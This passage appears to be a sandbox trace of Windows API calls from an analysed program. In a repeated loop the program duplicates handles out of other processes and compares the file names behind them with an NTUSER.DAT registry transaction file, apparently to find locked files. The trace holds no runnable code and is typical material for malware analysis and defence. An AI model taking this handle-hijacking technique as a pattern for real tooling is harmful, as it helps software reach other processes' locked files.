hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.010] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.011] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.012] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.012] CloseHandle (hObject=0x1e4) returned 1 [0166.012] _wcsicmp (_Str1="\\WindowsUpdate.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.012] CloseHandle (hObject=0x194) returned 1 [0166.012] CloseHandle (hObject=0x1e8) returned 1 [0166.012] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0166.012] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10ec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.013] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.013] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.014] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.014] CloseHandle (hObject=0x1e4) returned 1 [0166.014] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -3 [0166.014] CloseHandle (hObject=0x194) returned 1 [0166.015] CloseHandle (hObject=0x1e8) returned 1 [0166.015] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0166.015] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1108, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.015] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.016] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.016] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.016] CloseHandle (hObject=0x1e4) returned 1 [0166.017] CloseHandle (hObject=0x194) returned 1 [0166.017] CloseHandle (hObject=0x1e8) returned 1 [0166.017] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0166.017] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x110c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.017] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.018] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.019] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.019] CloseHandle (hObject=0x1e4) returned 1 [0166.019] CloseHandle (hObject=0x194) returned 1 [0166.019] CloseHandle (hObject=0x1e8) returned 1 [0166.019] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0166.019] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1178, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.019] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.020] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.021] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.021] CloseHandle (hObject=0x1e4) returned 1 [0166.021] _wcsicmp (_Str1="\\edb.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -9 [0166.021] CloseHandle (hObject=0x194) returned 1 [0166.021] CloseHandle (hObject=0x1e8) returned 1 [0166.021] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0166.021] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1180, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.021] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.022] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.023] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.023] CloseHandle (hObject=0x1e4) returned 1 [0166.023] _wcsicmp (_Str1="\\tmp.edb", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0166.023] CloseHandle (hObject=0x194) returned 1 [0166.023] CloseHandle (hObject=0x1e8) returned 1 [0166.023] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0166.023] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x118c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.023] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.024] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.024] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.025] CloseHandle (hObject=0x1e4) returned 1 [0166.025] _wcsicmp (_Str1="\\DataStore.edb", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -10 [0166.025] CloseHandle (hObject=0x194) returned 1 [0166.025] CloseHandle (hObject=0x1e8) returned 1 [0166.025] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0166.025] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1228, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.025] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.026] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.029] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.029] CloseHandle (hObject=0x1e4) returned 1 [0166.029] _wcsicmp (_Str1="\\wuaueng.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.029] CloseHandle (hObject=0x194) returned 1 [0166.030] CloseHandle (hObject=0x1e8) returned 1 [0166.030] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0166.030] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x1e8 [0166.030] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.030] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.030] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.031] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.032] CloseHandle (hObject=0x1e4) returned 1 [0166.032] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0166.032] CloseHandle (hObject=0x194) returned 1 [0166.032] CloseHandle (hObject=0x1e8) returned 1 [0166.032] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x1e8 [0166.032] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.032] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.033] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.034] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.034] CloseHandle (hObject=0x1e4) returned 1 [0166.034] CloseHandle (hObject=0x194) returned 1 [0166.034] CloseHandle (hObject=0x1e8) returned 1 [0166.034] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x1e8 [0166.034] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xd4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.035] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.035] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.040] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.040] CloseHandle (hObject=0x1e4) returned 1 [0166.041] CloseHandle (hObject=0x194) returned 1 [0166.041] CloseHandle (hObject=0x1e8) returned 1 [0166.041] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x1e8 [0166.041] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x154, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.041] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.041] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.042] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.042] CloseHandle (hObject=0x1e4) returned 1 [0166.042] _wcsicmp (_Str1="\\stdole2.tlb", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0166.042] CloseHandle (hObject=0x194) returned 1 [0166.043] CloseHandle (hObject=0x1e8) returned 1 [0166.043] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x1e8 [0166.043] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x190, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.043] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.044] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.044] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.045] CloseHandle (hObject=0x1e4) returned 1 [0166.045] _wcsicmp (_Str1="\\es.dll", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -9 [0166.045] CloseHandle (hObject=0x194) returned 1 [0166.045] CloseHandle (hObject=0x1e8) returned 1 [0166.045] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xc8) returned 0x1e8 [0166.045] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x3c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.045] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.046] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.046] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.046] CloseHandle (hObject=0x1e4) returned 1 [0166.046] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -3 [0166.046] CloseHandle (hObject=0x194) returned 1 [0166.047] CloseHandle (hObject=0x1e8) returned 1 [0166.047] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0166.047] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.047] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.047] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.048] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.048] CloseHandle (hObject=0x1e4) returned 1 [0166.048] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0166.048] CloseHandle (hObject=0x194) returned 1 [0166.048] CloseHandle (hObject=0x1e8) returned 1 [0166.049] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0166.049] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.049] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.049] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.050] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.050] CloseHandle (hObject=0x1e4) returned 1 [0166.051] CloseHandle (hObject=0x194) returned 1 [0166.051] CloseHandle (hObject=0x1e8) returned 1 [0166.051] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0166.051] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x11c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.051] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.052] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.055] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.056] CloseHandle (hObject=0x1e4) returned 1 [0166.056] CloseHandle (hObject=0x194) returned 1 [0166.056] CloseHandle (hObject=0x1e8) returned 1 [0166.056] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0166.056] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x124, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.056] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.056] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.057] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.057] CloseHandle (hObject=0x1e4) returned 1 [0166.057] _wcsicmp (_Str1="\\etc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -9 [0166.057] CloseHandle (hObject=0x194) returned 1 [0166.057] CloseHandle (hObject=0x1e8) returned 1 [0166.057] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0166.058] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.058] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.058] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.059] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.059] CloseHandle (hObject=0x1e4) returned 1 [0166.059] CloseHandle (hObject=0x194) returned 1 [0166.059] CloseHandle (hObject=0x1e8) returned 1 [0166.059] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0166.059] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.059] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.060] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.062] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.062] CloseHandle (hObject=0x1e4) returned 1 [0166.062] CloseHandle (hObject=0x194) returned 1 [0166.062] CloseHandle (hObject=0x1e8) returned 1 [0166.062] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0166.062] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1e4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.062] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.063] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.063] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.064] CloseHandle (hObject=0x1e4) returned 1 [0166.064] CloseHandle (hObject=0x194) returned 1 [0166.064] CloseHandle (hObject=0x1e8) returned 1 [0166.064] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0166.064] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x20c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.064] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.064] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.065] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.065] CloseHandle (hObject=0x1e4) returned 1 [0166.065] CloseHandle (hObject=0x194) returned 1 [0166.065] CloseHandle (hObject=0x1e8) returned 1 [0166.066] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0166.066] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x210, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.066] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.066] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.067] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.067] CloseHandle (hObject=0x1e4) returned 1 [0166.067] CloseHandle (hObject=0x194) returned 1 [0166.067] CloseHandle (hObject=0x1e8) returned 1 [0166.067] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0166.068] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x21c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.068] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.068] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.069] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.069] CloseHandle (hObject=0x1e4) returned 1 [0166.069] _wcsicmp (_Str1="\\wkssvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.069] CloseHandle (hObject=0x194) returned 1 [0166.070] CloseHandle (hObject=0x1e8) returned 1 [0166.070] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0166.070] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x228, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.070] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.070] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.071] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.071] CloseHandle (hObject=0x1e4) returned 1 [0166.071] _wcsicmp (_Str1="\\wkssvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.071] CloseHandle (hObject=0x194) returned 1 [0166.072] CloseHandle (hObject=0x1e8) returned 1 [0166.072] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0166.072] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x22c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.072] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.072] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.073] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.073] CloseHandle (hObject=0x1e4) returned 1 [0166.073] _wcsicmp (_Str1="\\wkssvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.073] CloseHandle (hObject=0x194) returned 1 [0166.073] CloseHandle (hObject=0x1e8) returned 1 [0166.073] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x11c) returned 0x1e8 [0166.073] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x268, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.073] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | 